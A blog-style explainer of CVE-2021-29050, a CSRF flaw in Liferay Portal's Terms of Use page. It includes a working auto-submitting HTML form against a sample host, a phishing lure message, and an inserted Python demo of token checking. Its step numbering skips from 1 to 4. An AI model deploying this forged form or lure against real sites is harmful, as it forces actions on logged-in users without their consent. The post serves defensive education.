Liferay Portal is a popular open-source platform for building websites and digital workspaces. However, it’s not immune to security flaws. CVE-2021-29050 is a real-world example of how web applications — even big, trusted ones — can be exposed to Cross-Site Request Forgery (CSRF) attacks.
In this post, I’ll walk you through what this vulnerability is, how it can be abused, and show an exclusive example of how an attacker could exploit it — step by step.
Affected versions: Liferay DXP 7.3 (before Service Pack 1) and 7.2 (before Fix Pack 11)
It allows an attacker to trick a logged-in user into *unknowingly* accepting the site’s terms of use. This is possible by exploiting a Cross-Site Request Forgery (CSRF) flaw on the Terms of Use acceptance page.
What’s a CSRF Attack?
A CSRF attack basically hijacks the trust a site has in a user’s browser session. If a user is already logged in, an attacker can craft a special request and get the user (via tricks, like links or hidden forms) to “perform” an action *as if they really meant to*, even if they never intended to.
For example, this is like tricking someone into clicking a button on a bank website without them knowing — just by getting them to visit a malicious webpage.
How Does This Vulnerability Work?
In Liferay Portal’s vulnerable versions, the page where users accept the Terms of Use does not have proper CSRF protection — like a one-time token that’s required every time a user does a sensitive action.
That means, *any web page*, anywhere on the internet, can submit a form request (or make a POST) to this Terms of Use endpoint and force the logged-in user to accept the terms — without their knowledge or consent.
Imagine a malicious website tricking you into accepting terms you never even read!
Exploiting CVE-2021-29050: Step-by-Step Example
Let’s look at how an attacker could actually do this.
1. Identify the Target Endpoint
In Liferay, when users are shown the Terms of Use page, they typically POST a request like this (for example):
```http
POST /c/portal/accept_terms HTTP/1.1
Host: victim-liferay.com
...

acceptTerms=true
```
The attacker creates a simple HTML file like this:
```html
<!-- Attacker's CSRF Page: csrf.html -->
<html>
<body>
<form id="csrfForm" action="https://victim-liferay.com/c/portal/accept_terms" method="POST">
<input type="hidden" name="acceptTerms" value="true">
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
```
When the user visits this page (while logged in to Liferay in another tab), the browser will automatically send the POST request and the server will *think* the user has accepted the Terms of Use.
The attacker sends a phishing email or chat message with a link to their malicious page:
> "Hi, check out this funny picture!" (link to csrf.html)
4. Victim Visits Link
If the victim is already logged in to the Liferay site (in another tab/browser session), simply loading the attacker's page will trigger the POST request silently.
5. Result: Terms Accepted Without User Consent
Now the victim has ‘accepted’ the Terms of Use — without even visiting the page, or reading a word.
Fixed versions: Liferay DXP 7.2 Fix Pack 11 and later
If you use an older version, update immediately.
Developers: Always use CSRF tokens on *ALL* state-changing forms (POST, PUT, DELETE, etc.).
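The token check recommended above, as an added example that is not from the original post or from Liferay's code: a handler that trusts the session alone, beside one that requires a one-time token issued with the form. The handler names, the `csrfToken` field and the dict-based session are assumptions made for illustration.

```python
import hmac
import secrets

def new_session():
    # Constructed stand-in for a logged-in user's server-side session.
    return {"id": secrets.token_hex(8), "terms_accepted": False}

def render_terms_form(session):
    """Legitimate Terms of Use page: mint a fresh token and embed it in the form."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return {"acceptTerms": "true", "csrfToken": session["csrf_token"]}

def accept_terms_vulnerable(session, form):
    """Behaviour the post describes: the session cookie alone authorises the change."""
    if form.get("acceptTerms") == "true":
        session["terms_accepted"] = True
    return 200

def accept_terms_hardened(session, form):
    """Same action, but the POST must carry the token issued with the form."""
    expected = session.get("csrf_token")
    submitted = form.get("csrfToken") or ""
    # Compare as bytes: compare_digest raises TypeError on non-ASCII str input.
    if expected is None or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return 403
    del session["csrf_token"]  # one-time: a replayed form is rejected
    if form.get("acceptTerms") == "true":
        session["terms_accepted"] = True
    return 200

def demo():
    cross_site_post = {"acceptTerms": "true"}  # all a foreign page can supply
    results = {}
    s = new_session()
    results["vulnerable_forged"] = (accept_terms_vulnerable(s, cross_site_post), s["terms_accepted"])
    s = new_session()
    render_terms_form(s)  # a token exists, but another origin cannot read it
    results["hardened_forged"] = (accept_terms_hardened(s, cross_site_post), s["terms_accepted"])
    s = new_session()
    form = render_terms_form(s)
    results["hardened_legit"] = (accept_terms_hardened(s, form), s["terms_accepted"])
    results["hardened_replay"] = accept_terms_hardened(s, form)  # token already consumed
    return results

if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

The forged POST succeeds only against the first handler; the second rejects it with 403 because a page on another origin has no way to read the token stored in the victim's session.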
Conclusion
CSRF vulnerabilities may seem simple, but they can have serious consequences — and can be exploited with just a few lines of code. If you’re running Liferay Portal or Liferay DXP, make sure you’re on a patched version, and always watch out for things like CSRF protection whenever you develop or manage any kind of web application.
If you want to test your own site — log in, open the browser’s dev tools, and try posting to the Terms of Use endpoint *without* the legitimate form. If it works, you’re at risk!
Timeline
Published on: 02/20/2024 22:15:08 UTC
Last modified on: 08/01/2024 13:42:11 UTC